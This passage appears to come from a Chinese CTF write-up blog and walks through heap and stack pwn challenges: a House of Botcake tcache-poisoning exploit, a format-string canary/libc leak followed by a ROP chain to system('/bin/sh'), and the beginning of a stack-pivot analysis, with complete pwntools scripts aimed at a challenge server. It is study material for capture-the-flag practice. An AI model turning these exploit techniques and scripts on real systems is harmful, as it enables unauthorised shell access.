<strong>\u91cd\u53e0<\/strong>\u3002<\/p>\n\n\n\n<p><strong>\u653b\u51fb\u6b65\u9aa4<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u5806\u5e03\u5c40\u51c6\u5907<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u5206\u914d 7 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757\u4f5c\u4e3a <strong>Fillers<\/strong>\uff08\u7528\u4e8e\u4e4b\u540e\u586b\u6ee1 Tcache\uff09\u3002<\/li>\n\n\n\n<li>\u5206\u914d 1 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757 <strong>Prev<\/strong>\u3002<\/li>\n\n\n\n<li>\u5206\u914d 1 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757 <strong>Victim<\/strong>\uff08\u8fd9\u662f\u6211\u4eec\u8981\u91cd\u53e0\u7684\u5757\uff09\u3002<\/li>\n\n\n\n<li>\u5206\u914d 1 \u4e2a 0x100 \u5927\u5c0f\u7684\u5757 <strong>Guard<\/strong>\uff08\u9632\u6b62\u4e0e Top Chunk \u5408\u5e76\uff0c\u5e76\u9884\u7f6e <code>\/bin\/sh<\/code>\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u6cc4\u9732 Libc<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u91ca\u653e 7 \u4e2a Fillers\uff0c\u586b\u6ee1 0x110 \u5927\u5c0f\u7684 Tcache \u94fe\u8868\u3002<\/li>\n\n\n\n<li>\u91ca\u653e <strong>Victim<\/strong>\u3002\u7531\u4e8e Tcache \u5df2\u6ee1\uff0cVictim \u8fdb\u5165 <strong>Unsorted Bin<\/strong>\u3002<\/li>\n\n\n\n<li>\u5229\u7528 UAF\uff0c\u8c03\u7528 <code>show(Victim)<\/code>\u3002\u6b64\u65f6 Victim \u7684 <code>fd<\/code> \u6307\u9488\u6307\u5411 <code>main_arena<\/code> \u9644\u8fd1\u3002\u8bfb\u53d6\u8be5\u6307\u9488\u8ba1\u7b97\u51fa Libc \u57fa\u5740\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u6784\u9020\u91cd\u53e0 (House of Botcake)<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u91ca\u653e <strong>Prev<\/strong>\u3002\u7531\u4e8e Victim \u5df2\u7ecf\u5728 Unsorted Bin \u4e2d\uff08\u4e14\u7269\u7406\u76f8\u90bb\uff09\uff0cPrev \u4f1a\u4e0e Victim \u5408\u5e76\uff0c\u5f62\u6210\u4e00\u4e2a\u5927\u5c0f\u4e3a 0x220 \u7684\u5927 Unsorted Bin Chunk\u3002<\/li>\n\n\n\n<li>\u6b64\u65f6\uff0c\u867d\u7136 Victim 
\u5728\u903b\u8f91\u4e0a\u662f\u5408\u5e76\u5927\u5757\u7684\u4e00\u90e8\u5206\uff0c\u4f46\u6211\u4eec\u5728 <code>nodes<\/code> \u6570\u7ec4\u4e2d\u4ecd\u7136\u6301\u6709\u6307\u5411 Victim \u7684\u60ac\u5782\u6307\u9488\u3002<\/li>\n\n\n\n<li>\u7533\u8bf7\u4e00\u4e2a\u5757\uff08\u4ece Tcache \u53d6\u51fa\uff09\uff0c\u6d88\u8017\u6389 Tcache \u7684\u4e00\u4e2a\u7a7a\u4f4d\uff0c\u4f7f Tcache \u8ba1\u6570\u53d8\u4e3a 6\u3002<\/li>\n\n\n\n<li><strong>\u518d\u6b21\u91ca\u653e Victim<\/strong>\u3002\n<ul class=\"wp-block-list\">\n<li><strong>\u5173\u952e\u70b9<\/strong>\uff1a\u6b64\u65f6 Victim \u4f4d\u4e8e Unsorted Bin \u7684\u5927\u5757\u5185\u90e8\uff0c\u5176 <code>key<\/code> \u5b57\u6bb5\uff08\u5728 2.29 \u4e2d\u7528\u4e8e\u68c0\u6d4b Double Free\uff09\u88ab Unsorted Bin \u7684\u5143\u6570\u636e\u8986\u76d6\u6216\u5904\u4e8e\u975e Tcache \u72b6\u6001\u3002<\/li>\n\n\n\n<li>\u7531\u4e8e Tcache \u6709\u7a7a\u4f4d\uff086\/7\uff09\uff0cVictim \u88ab\u6210\u529f\u653e\u5165 Tcache \u94fe\u8868\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u73b0\u72b6<\/strong>\uff1aVictim \u73b0\u5728 <strong>\u65e2\u5728 Tcache \u94fe\u8868\u4e2d<\/strong>\uff08\u7b49\u5f85\u88ab\u5206\u914d\uff09\uff0c<strong>\u53c8\u662f Unsorted Bin \u5927\u5757\u7684\u4e00\u90e8\u5206<\/strong>\uff08\u53ef\u4ee5\u88ab\u8986\u5199\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Tcache Poisoning<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7533\u8bf7\u4e00\u4e2a\u6bd4 Victim \u66f4\u5927\u7684\u5757\uff08\u4f8b\u5982 0x120\uff09\uff0c\u7cfb\u7edf\u4f1a\u4ece Unsorted Bin \u7684\u5927\u5757\uff080x220\uff09\u4e2d\u5207\u5272\u3002<\/li>\n\n\n\n<li>\u8fd9\u6b21\u7533\u8bf7\u7684\u5185\u5bb9\u4f1a\u8986\u76d6\u5230 Victim \u7684\u5934\u90e8\u548c <code>fd<\/code> \u6307\u9488\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u5c06 Victim \u7684 <code>fd<\/code> \u4fee\u6539\u4e3a <code>__free_hook<\/code> \u7684\u5730\u5740\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Get Shell<\/strong>:\n<ul 
class=\"wp-block-list\">\n<li>\u7533\u8bf7 0x100 \u5927\u5c0f\uff0c\u53d6\u56de Victim \u5757\u3002<\/li>\n\n\n\n<li>\u518d\u6b21\u7533\u8bf7 0x100 \u5927\u5c0f\uff0c\u7cfb\u7edf\u4f1a\u8fd4\u56de\u6211\u4eec\u4f2a\u9020\u7684\u5730\u5740 <code>__free_hook<\/code>\u3002<\/li>\n\n\n\n<li>\u5411 <code>__free_hook<\/code> \u5199\u5165 <code>system<\/code> \u51fd\u6570\u5730\u5740\u3002<\/li>\n\n\n\n<li>\u91ca\u653e <strong>Guard<\/strong> \u5757\uff08\u5185\u5bb9\u4e3a <code>\/bin\/sh<\/code>\uff09\uff0c\u89e6\u53d1 <code>system(\"\/bin\/sh\")<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p><strong>Exp<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'info'<br>context.terminal = &#91;'tmux', 'splitw', '-h']<br>\u200b<br>binary_path = '.\/pwn'<br>libc_path = '.\/libc-2.29.so'<br>\u200b<br>try:<br> &nbsp; &nbsp;elf = ELF(binary_path)<br> &nbsp; &nbsp;libc = ELF(libc_path)<br>except:<br> &nbsp; &nbsp;pass<br>\u200b<br>def start_process():<br> &nbsp; &nbsp;if args.REMOTE:<br> &nbsp; &nbsp; &nbsp; &nbsp;return remote('challenge.bluesharkinfo.com', 23858)<br> &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp;return process(binary_path)<br>\u200b<br>def add(p, size, content):<br> &nbsp; &nbsp;p.sendlineafter(b\"Your choice: \", b\"1\")<br> &nbsp; &nbsp;p.sendlineafter(b\"Size: \", str(size).encode())<br> &nbsp; &nbsp;p.sendafter(b\"Content: \", content)<br>\u200b<br>def delete(p, index):<br> &nbsp; &nbsp;p.sendlineafter(b\"Your choice: \", b\"2\")<br> &nbsp; &nbsp;p.sendlineafter(b\"Index: \", str(index).encode())<br>\u200b<br>def show(p, index):<br> &nbsp; &nbsp;p.sendlineafter(b\"Your choice: \", b\"3\")<br> &nbsp; &nbsp;p.sendlineafter(b\"Index: \", str(index).encode())<br>\u200b<br>def exploit():<br> &nbsp; &nbsp;p = start_process()<br>\u200b<br> &nbsp; &nbsp;# \u5206\u914d 7 \u4e2a\u586b\u5145\u5757 + Prev + Victim + Guard<br> &nbsp; &nbsp;# \u7d22\u5f15 0-6: Fillers<br> &nbsp; 
&nbsp;for i in range(7):<br> &nbsp; &nbsp; &nbsp; &nbsp;add(p, 0x100, b\"Filler\") <br> &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x100, b\"Prev\") &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x100, b\"Victim\") &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x100, b\"\/bin\/sh\\x00\") <br>\u200b<br>\u200b<br> &nbsp; &nbsp;# \u91ca\u653e Fillers \u586b\u6ee1 Tcache<br> &nbsp; &nbsp;for i in range(7):<br> &nbsp; &nbsp; &nbsp; &nbsp;delete(p, i)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# Victim \u8fdb Unsorted Bin<br> &nbsp; &nbsp;delete(p, 8)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u5229\u7528 UAF \u8bfb\u53d6 fd \u6307\u9488<br> &nbsp; &nbsp;show(p, 8)<br> &nbsp; &nbsp;p.recvuntil(b\"Content: \")<br> &nbsp; &nbsp;leak = u64(p.recvline()&#91;:-1].ljust(8, b\"\\x00\"))<br> &nbsp; &nbsp;log.info(f\"Leaked Unsorted Bin Address: {hex(leak)}\")<br>\u200b<br> &nbsp; &nbsp;libc_base = leak - 96 - 0x10 - libc.symbols&#91;'__malloc_hook']<br> &nbsp; &nbsp;libc.address = libc_base<br> &nbsp; &nbsp;log.success(f\"Libc Base: {hex(libc_base)}\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;free_hook = libc.symbols&#91;'__free_hook']<br> &nbsp; &nbsp;system = libc.symbols&#91;'system']<br>\u200b<br>\u200b<br> &nbsp; &nbsp;# \u91ca\u653e Prev (7)\u3002\u56e0\u4e3a Victim (8) \u5728 Unsorted Bin\uff0c\u5b83\u4eec\u5408\u5e76\u6210 0x220 \u7684\u5927\u5757\u3002<br> &nbsp; &nbsp;delete(p, 7)<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;add(p, 0x100, b\"Tcache consumer\") # Index 10<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;delete(p, 8)<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;# \u4ece Unsorted Bin (\u5408\u5e76\u7684\u5927\u5757) \u5207\u5272\u7533\u8bf7\u3002<br> &nbsp; &nbsp;# \u8986\u76d6\u8303\u56f4\uff1aPrev \u7684\u6570\u636e\u533a(0x100) + Victim \u7684 Header(0x10) + Victim \u7684 fd<br> &nbsp; &nbsp;payload = b'A' * 0x100<br> &nbsp; &nbsp;payload += p64(0) + p64(0x111) # \u6062\u590d Victim \u7684 Size \u5b57\u6bb5<br> &nbsp; &nbsp;payload += p64(free_hook) &nbsp; &nbsp; &nbsp;# 
\u4fee\u6539 Tcache \u7684 fd \u6307\u9488<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;add(p, 0x120, payload) <br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;add(p, 0x100, b\"Victim retrieval\") # Index 12 (\u53d6\u51fa Victim)<br> &nbsp; &nbsp;add(p, 0x100, p64(system)) &nbsp; &nbsp; &nbsp; &nbsp; # Index 13 (\u53d6\u51fa __free_hook)<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;# free(Guard) -&gt; system(\"\/bin\/sh\")<br> &nbsp; &nbsp;delete(p, 9)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.interactive()<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Heap?<\/h2>\n\n\n\n<p>\u7a0b\u5e8f\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u5806\u7ba1\u7406\u5668\uff0c\u5305\u542b\u4e09\u4e2a\u4e3b\u8981\u529f\u80fd\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>add<\/strong>: \u5206\u914d\u6307\u5b9a\u5927\u5c0f\u7684\u5806\u5757\u5e76\u5199\u5165\u5185\u5bb9<\/li>\n\n\n\n<li><strong>delete<\/strong>: \u91ca\u653e\u6307\u5b9a\u7d22\u5f15\u7684\u5806\u5757<\/li>\n\n\n\n<li><strong>show<\/strong>: \u663e\u793a\u6307\u5b9a\u7d22\u5f15\u7684\u5806\u5757\u5185\u5bb9<\/li>\n<\/ul>\n\n\n\n<p><strong>(1) \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e (show\u51fd\u6570)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>printf(*((const char **)&amp;list + v1&#91;0])); &nbsp;\/\/ \u76f4\u63a5\u4f7f\u7528\u7528\u6237\u63a7\u5236\u7684\u5b57\u7b26\u4e32\u4f5c\u4e3a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32<\/code><\/pre>\n\n\n\n<p><strong>(2) \u6808\u6ea2\u51fa\u6f0f\u6d1e (read_num\u51fd\u6570)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>unsigned int buf; \/\/ &#91;rsp+10h] &#91;rbp-20h]<br>char v2&#91;16]; \/\/ &#91;rsp+18h] &#91;rbp-18h]<br>read(0, &amp;buf, 8uLL); &nbsp;\/\/ \u8bfb\u53d68\u5b57\u8282\u5230buf<br>read(0, v2, buf); &nbsp; &nbsp; \/\/ \u6839\u636ebuf\u7684\u503c\u8bfb\u53d6\u6570\u636e\u5230v2\uff0c\u5982\u679cbuf &gt; 
16\uff0c\u4f1a\u5bfc\u81f4\u6808\u6ea2\u51fa<\/code><\/pre>\n\n\n\n<p>\u4f7f\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u6cc4\u9732\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Canary<\/strong>: \u7ed5\u8fc7\u6808\u4fdd\u62a4<\/li>\n\n\n\n<li><strong>libc\u5730\u5740<\/strong>: \u8ba1\u7b97libc\u57fa\u5740<\/li>\n\n\n\n<li><strong>\u7a0b\u5e8f\u57fa\u5740<\/strong>: \u8ba1\u7b97gadget\u5730\u5740<\/li>\n<\/ul>\n\n\n\n<p>\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u89e3\u6790\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u901a\u8fc7<code>%p<\/code>\u6cc4\u9732\u591a\u4e2a\u5730\u5740<\/li>\n\n\n\n<li>\u4ece\u6cc4\u9732\u6570\u636e\u4e2d\u8bc6\u522bcanary\uff08\u901a\u5e38\u4ee5<code>00<\/code>\u7ed3\u5c3e\uff09<\/li>\n\n\n\n<li>\u627e\u5230<code>__libc_start_main+243<\/code>\u7684\u5730\u5740\u8ba1\u7b97libc\u57fa\u5740<\/li>\n<\/ul>\n\n\n\n<p>libc\u57fa\u5740 = \u6cc4\u9732\u7684libc\u5730\u5740 &#8211; 0x29d90<\/p>\n\n\n\n<p>\u83b7\u53d6gadget\u5730\u5740\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>pop rdi; ret<\/code>: libc\u57fa\u5740 + 0x2a3e5<\/li>\n\n\n\n<li><code>ret<\/code>: libc\u57fa\u5740 + 0x29139<\/li>\n<\/ul>\n\n\n\n<p>\u83b7\u53d6\u5173\u952e\u51fd\u6570\u5730\u5740\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>system<\/code>: libc.sym[&#8216;system&#8217;]<\/li>\n\n\n\n<li><code>\/bin\/sh<\/code>\u5b57\u7b26\u4e32\u5730\u5740: <code>next(libc.search(b'\/bin\/sh\\x00'))<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u7406\u89e3\u6808\u5e03\u5c40\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>rbp-0x18: v2\u7f13\u51b2\u533a\u5f00\u59cb\uff0816\u5b57\u8282\uff09<br>rbp-0x8: canary<br>rbp: saved rbp<br>rbp+0x8: \u8fd4\u56de\u5730\u5740<\/code><\/pre>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6784\u9020payload\uff1a\n<ul 
class=\"wp-block-list\">\n<li>\u7531\u4e8e<code>v2<\/code>\u7684\u524d4\u5b57\u8282\u88ab\u7b2c\u4e00\u4e2a<code>read<\/code>\u7684\u540e4\u5b57\u8282\u8986\u76d6\uff0c\u6240\u4ee5\u5b9e\u9645\u53ef\u63a7\u6570\u636e\u4ece<code>v2+4<\/code>\u5f00\u59cb<\/li>\n\n\n\n<li>\u4ece<code>v2+4<\/code>\u5230canary\u7684\u504f\u79fb\uff1a<code>0x10 - 4 = 12<\/code>\u5b57\u8282<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>payload\u7ed3\u6784\uff1a4\u5b57\u8282: \u4efb\u610f\uff08\u4f1a\u88ab\u8986\u76d6\uff09<br>12\u5b57\u8282: \u586b\u5145<br>8\u5b57\u8282: canary<br>8\u5b57\u8282: saved rbp (0)<br>8\u5b57\u8282: pop rdi; ret<br>8\u5b57\u8282: \/bin\/sh\u5730\u5740<br>8\u5b57\u8282: ret (\u6808\u5bf9\u9f50)<br>8\u5b57\u8282: system\u5730\u5740<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'info'<br>\u200b<br>BINARY = '.\/pwn'<br>LIBC = '.\/libc.so.6'<br>LD = '.\/ld-linux-x86-64.so.2'<br>\u200b<br>elf = ELF(BINARY, checksec=False)<br>libc = ELF(LIBC, checksec=False)<br>\u200b<br>def start():<br> &nbsp; &nbsp;return remote('challenge.bluesharkinfo.com', 23616)<br>\u200b<br>def add(size, content):<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'1')<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', str(size).encode())<br> &nbsp; &nbsp;p.sendafter(b'&gt; ', content)<br> &nbsp; &nbsp;p.recvuntil(b'OK!\\n')<br>\u200b<br>def show(idx):<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'3')<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', str(idx).encode())<br> &nbsp; &nbsp;return p.recvline()<br>\u200b<br>def leak_addresses():<br> &nbsp; &nbsp;fmt_payload = b'%p.' 
* 50<br> &nbsp; &nbsp;add(len(fmt_payload), fmt_payload)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'3')<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'0')<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;leak_data = p.recvuntil(b'\\n').strip()<br> &nbsp; &nbsp;leaks = leak_data.split(b'.')<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;leak_vals = &#91;]<br> &nbsp; &nbsp;for leak in leaks:<br> &nbsp; &nbsp; &nbsp; &nbsp;if leak == b'(nil)':<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_vals.append(0)<br> &nbsp; &nbsp; &nbsp; &nbsp;elif leak.startswith(b'0x'):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_vals.append(int(leak, 16))<br> &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_vals.append(0)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;canary = leak_vals&#91;6]<br> &nbsp; &nbsp;libc_leak = leak_vals&#91;12]<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;log.success(f\"Canary: {hex(canary)}\")<br> &nbsp; &nbsp;log.success(f\"Libc leak: {hex(libc_leak)}\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;libc.address = libc_leak - 0x29d90 &nbsp;# __libc_start_main+243<br> &nbsp; &nbsp;log.success(f\"Libc base: {hex(libc.address)}\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;return canary<br>\u200b<br>def exploit():<br> &nbsp; &nbsp;global p<br> &nbsp; &nbsp;p = start()<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;canary = leak_addresses()<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;pop_rdi = libc.address + 0x2a3e5 &nbsp;# pop rdi; ret<br> &nbsp; &nbsp;ret = libc.address + 0x29139 &nbsp; &nbsp; &nbsp;# ret<br> &nbsp; &nbsp;system_addr = libc.symbols&#91;'system']<br> &nbsp; &nbsp;bin_sh_addr = next(libc.search(b'\/bin\/sh\\x00'))<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;log.info(f\"pop_rdi: {hex(pop_rdi)}\")<br> &nbsp; &nbsp;log.info(f\"ret: {hex(ret)}\")<br> &nbsp; &nbsp;log.info(f\"system: {hex(system_addr)}\")<br> &nbsp; &nbsp;log.info(f\"\/bin\/sh: {hex(bin_sh_addr)}\")<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;payload = b'0000' &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;payload 
+= b'A' * 12 &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;payload += p64(canary) &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += p64(0) &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;payload += p64(pop_rdi) &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += p64(bin_sh_addr) <br> &nbsp; &nbsp;payload += p64(ret) &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;payload += p64(system_addr) <br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;payload = payload.ljust(0x100, b'B')<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;p.sendlineafter(b'&gt; ', b'2') <br> &nbsp; &nbsp;p.sendafter(b'&gt; ', p32(len(payload)) + b'0\\x00\\x00\\x00')<br> &nbsp; &nbsp;p.send(payload)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.interactive()<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">ez_stack<\/h2>\n\n\n\n<p>\u62ff\u5230\u9898\u76ee\u9644\u4ef6 <code>baby_stack<\/code>\uff0c\u9996\u5148\u8fdb\u884c\u5e38\u89c4\u68c0\u67e5\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Checksec<\/strong>:\n<ul class=\"wp-block-list\">\n<li>Arch: amd64-64-little<\/li>\n\n\n\n<li>RELRO: Full RELRO<\/li>\n\n\n\n<li>Stack: Canary found<\/li>\n\n\n\n<li>NX: NX enabled<\/li>\n\n\n\n<li>PIE: PIE enabled<\/li>\n\n\n\n<li>Seccomp: Enabled (Ban <code>execve<\/code>)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u9006\u5411\u5206\u6790<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7a0b\u5e8f\u4e3b\u903b\u8f91\u5728 <code>main<\/code> \u51fd\u6570\u4e2d\uff0c\u4f9d\u6b21\u8c03\u7528\u4e86\u51e0\u4e2a\u529f\u80fd\u51fd\u6570\u3002<\/li>\n\n\n\n<li><code>init_data_and_syscall<\/code>: \u521d\u59cb\u5316\u6c99\u7bb1\uff0c\u7981\u7528 <code>execve<\/code>\uff0c\u53ea\u80fd\u4f7f\u7528 ORW (Open-Read-Write) \u8bfb\u53d6 flag\u3002<\/li>\n\n\n\n<li><code>check_ret_addr_error<\/code>: \u5b58\u5728\u660e\u663e\u7684<strong>\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/strong>\u3002\n<ul class=\"wp-block-list\">\n<li>\u5b9a\u4e49\u4e86\u4e00\u4e2a 264 \u5b57\u8282\u7684\u7f13\u51b2\u533a 
<code>v4<\/code>\u3002<\/li>\n\n\n\n<li>\u8c03\u7528 <code>read_line_from_fd<\/code> \u8bfb\u53d6\u6700\u591a 4096 \u5b57\u8282\u5230 <code>v4<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u5173\u952e\u68c0\u67e5<\/strong>: \u51fd\u6570\u4f1a\u5728 <code>read<\/code> \u4e4b\u540e\u68c0\u67e5\u6808\u4e0a Return Address \u7684\u6700\u4f4e\u5b57\u8282 (LSB) \u662f\u5426\u88ab\u7be1\u6539\u3002\u5982\u679c LSB \u4e0d\u7b49\u4e8e\u539f\u59cb\u503c\uff08\u5373 <code>check_ret_addr_error<\/code> \u8fd4\u56de\u5730\u5740\u7684 LSB\uff09\uff0c\u5219\u8f93\u51fa\u9519\u8bef\u5e76\u9000\u51fa\u3002<\/li>\n\n\n\n<li><strong>Canary<\/strong>: \u867d\u7136 checksec \u663e\u793a\u6709 Canary\uff0c\u4e14\u51fd\u6570\u5f00\u5934\u8bbe\u7f6e\u4e86 Canary\uff0c\u4f46<strong>\u53cd\u6c47\u7f16\u663e\u793a\u8be5\u51fd\u6570\u5e76\u6ca1\u6709\u5728\u9000\u51fa\u524d\u68c0\u67e5 Canary<\/strong>\uff08\u6216\u8005\u662f\u6211\u4eec\u8986\u76d6 Saved RBP \u5bfc\u81f4\u63d0\u524d\u5d29\u6e83\uff09\uff0c\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u6ea2\u51fa\u8986\u76d6\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p><strong>1. 
\u7ed5\u8fc7\u4fdd\u62a4<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Canary<\/strong>: \u7531\u4e8e <code>check_ret_addr_error<\/code> \u7f3a\u5c11\u6709\u6548\u7684 Canary \u68c0\u67e5\uff08\u6216\u8005\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8986\u76d6 RBP \u52ab\u6301\u63a7\u5236\u6d41\u800c\u4e0d\u89e6\u53d1\u68c0\u67e5\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06\u5176\u89c6\u4e3a\u586b\u5145\u6570\u636e\u76f4\u63a5\u8986\u76d6\u3002<\/li>\n\n\n\n<li><strong>Return Address Check<\/strong>: \u8fd9\u662f\u4e00\u4e2a\u5f88\u96be\u7f20\u7684\u68c0\u67e5\u3002\u5982\u679c\u6211\u4eec\u76f4\u63a5\u8986\u76d6\u8fd4\u56de\u5730\u5740\u8fdb\u884c ROP\uff0cLSB \u80af\u5b9a\u4f1a\u6539\u53d8\uff08\u56e0\u4e3a Payload \u901a\u5e38\u5305\u542b NULL \u5b57\u8282\u6216\u5730\u5740\u968f\u673a\u5316\uff09\uff0c\u5bfc\u81f4\u68c0\u67e5\u5931\u8d25\u7a0b\u5e8f\u9000\u51fa\u3002\n<ul class=\"wp-block-list\">\n<li><strong>\u89e3\u51b3\u65b9\u6848<\/strong>: \u6211\u4eec\u5fc5\u987b\u6784\u9020\u4e00\u4e2a Return Address\uff0c\u5176 <strong>LSB \u4e0e\u539f\u59cb\u8fd4\u56de\u5730\u5740\u5b8c\u5168\u4e00\u81f4<\/strong>\u3002<\/li>\n\n\n\n<li>\u539f\u59cb\u8fd4\u56de\u5730\u5740\u662f <code>main<\/code> \u4e2d <code>call check_ret_addr_error<\/code> (0x1896) \u7684\u4e0b\u4e00\u6761\u6307\u4ee4\uff0c\u5373 <strong>0x189b<\/strong>\u3002LSB \u4e3a <strong>0x9b<\/strong>\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u5229\u7528 Stack Pivot \u6280\u672f\uff0c\u5c06\u6808\u52ab\u6301\u5230\u6211\u4eec\u53ef\u63a7\u7684\u5185\u5b58\u533a\u57df\uff0c\u4ece\u800c\u7ed5\u8fc7\u540e\u7eed\u7684\u9650\u5236\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>2. 
\u6808\u8fc1\u79fb<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u5229\u7528\u70b9<\/strong>: <code>main<\/code> \u51fd\u6570\u548c <code>check_ret_addr_error<\/code> \u51fd\u6570\u90fd\u4f7f\u7528 <code>leave; ret<\/code> \u6307\u4ee4\u4f5c\u4e3a\u7ed3\u5c3e\u3002\n<ul class=\"wp-block-list\">\n<li><code>leave<\/code> \u7b49\u4ef7\u4e8e <code>mov rsp, rbp; pop rbp<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Payload \u6784\u9020<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u6211\u4eec\u8986\u76d6\u6808\u4e0a\u7684 <strong>Saved RBP<\/strong> \u4e3a\u6211\u4eec\u60f3\u8981\u8fc1\u79fb\u5230\u7684\u5730\u5740\uff08<strong>FAKE_RBP<\/strong>\uff09\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u8986\u76d6 <strong>Return Address<\/strong> \u4e3a <code>main<\/code> \u51fd\u6570\u4e2d <code>check_ret_addr_error<\/code> \u8fd4\u56de\u540e\u7684\u5730\u5740 <strong>0x189b<\/strong>\u3002<\/li>\n\n\n\n<li>\u8fd9\u6837\uff0c<code>check_ret_addr_error<\/code> \u8fd4\u56de\u65f6\uff1a\n<ol class=\"wp-block-list\">\n<li>\u68c0\u67e5\u901a\u8fc7\uff08LSB 0x9b == 0x9b\uff09\u3002<\/li>\n\n\n\n<li>\u6267\u884c <code>leave<\/code>\uff0c\u5c06 <code>Saved 